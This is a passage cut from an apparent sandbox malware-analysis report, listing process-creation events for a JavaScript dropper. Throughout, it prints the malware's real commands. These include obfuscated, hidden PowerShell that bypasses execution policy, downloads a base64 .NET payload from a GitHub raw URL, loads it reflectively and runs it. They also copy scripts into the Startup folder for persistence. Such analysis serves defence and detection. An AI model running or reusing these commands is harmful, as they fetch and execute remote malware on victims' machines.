['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
